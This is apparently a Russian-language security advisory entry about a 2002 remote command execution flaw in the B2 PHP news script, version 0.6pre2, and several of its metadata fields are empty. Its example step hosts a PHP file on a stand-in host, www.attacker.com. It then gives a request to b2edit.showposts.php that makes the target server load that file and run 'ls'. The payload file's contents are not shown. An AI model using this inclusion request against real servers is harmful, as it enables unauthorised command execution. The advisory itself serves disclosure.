Дата публикации: | 08.05.2002 |
Всего просмотров: | 1046 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | B2 - php сценарий, который позволяет web-мастерам быстро отправлять новости. Обнаруженная уязвимость позволяет удаленному атакующему выполнять произвольные команды используя сценарий b2edit.showposts.php. Пример:
1. Создаем на своем сервере (www.attacker.com) сценарий b2functions.php, и записывает в него: 2. Запрос http://host/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls Выполнит команду ls на уязвимом сервере. Уязвимость обнаружена в B2 version 0.6pre2 |
Ссылки: | B2 PHP Remote Command Execution |